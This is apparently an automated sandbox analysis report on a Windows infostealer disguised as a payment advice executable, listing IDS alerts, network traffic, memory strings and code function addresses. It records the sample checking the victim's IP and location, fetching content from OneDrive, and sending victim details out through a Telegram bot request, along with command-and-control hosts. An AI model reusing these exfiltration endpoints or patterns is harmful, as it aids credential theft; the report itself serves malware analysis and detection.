            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51076 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51074 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51068 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51082 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51072 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:51078 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.5:51084 -> 37.27.123.72:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:51067 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.onedrive.com
            Source: global trafficDNS traffic detected: DNS query: fa3hwa.dm.files.1drv.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.foodex.com.pk
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 16 Nov 2024 15:51:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3352963551.0000000039D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/0
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foodex.com.pk
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.foodex.com.pk
            Source: PayeeAdvice_HK54912_R0038704_37504.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328960805.00000000089E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.oned
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/s
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20a
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003764A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003763A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa3hwa.dm.files.1drv.com/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa3hwa.dm.files.1drv.com/WE
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa3hwa.dm.files.1drv.com/ve
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGE
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.00000000374DA000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.00000000374DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037504000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.69$
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003767B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51067
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51068
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51070
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51082
            Source: unknownNetwork traffic detected: HTTP traffic on port 51072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51080
            Source: unknownNetwork traffic detected: HTTP traffic on port 51067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51074
            Source: unknownNetwork traffic detected: HTTP traffic on port 51074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51083
            Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:51083 version: TLS 1.2
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040335A
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00404B100_2_00404B10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_0040653F0_2_0040653F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00404B104_2_00404B10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0040653F4_2_0040653F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016C1474_2_0016C147
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016D2784_2_0016D278
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_001653624_2_00165362
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016C4684_2_0016C468
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016C7384_2_0016C738
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016E9884_2_0016E988
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016CA084_2_0016CA08
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016CCD84_2_0016CCD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00169DE04_2_00169DE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016CFAA4_2_0016CFAA
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00166FC84_2_00166FC8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016F9744_2_0016F974
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0016E97A4_2_0016E97A
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_001629E04_2_001629E0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00163E094_2_00163E09
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF29684_2_39EF2968
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFFC684_2_39EFFC68
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF50284_2_39EF5028
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF17A04_2_39EF17A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF93284_2_39EF9328
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF1E804_2_39EF1E80
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFE2584_2_39EFE258
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFDE004_2_39EFDE00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFDDF14_2_39EFDDF1
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD9A84_2_39EFD9A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD9994_2_39EFD999
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF95484_2_39EF9548
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD5404_2_39EFD540
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF295A4_2_39EF295A
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD5504_2_39EFD550
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD0E94_2_39EFD0E9
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFD0F84_2_39EFD0F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFCCA04_2_39EFCCA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFCC8F4_2_39EFCC8F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF00404_2_39EF0040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF00064_2_39EF0006
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFF8014_2_39EFF801
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF9C184_2_39EF9C18
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF50184_2_39EF5018
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFF8104_2_39EFF810
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFF3A84_2_39EFF3A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF8BA04_2_39EF8BA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFF3B84_2_39EFF3B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF178F4_2_39EF178F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFEF604_2_39EFEF60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFEF514_2_39EFEF51
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF0B204_2_39EF0B20
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF0B304_2_39EF0B30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFEB084_2_39EFEB08
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFEAF84_2_39EFEAF8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFE6A04_2_39EFE6A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFE6B04_2_39EFE6B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EF1E704_2_39EF1E70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFE2494_2_39EFE249
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_39EFE2574_2_39EFE257
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A777B784_2_3A777B78
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7777204_2_3A777720
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7781D04_2_3A7781D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A778FB04_2_3A778FB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A77B7A84_2_3A77B7A8
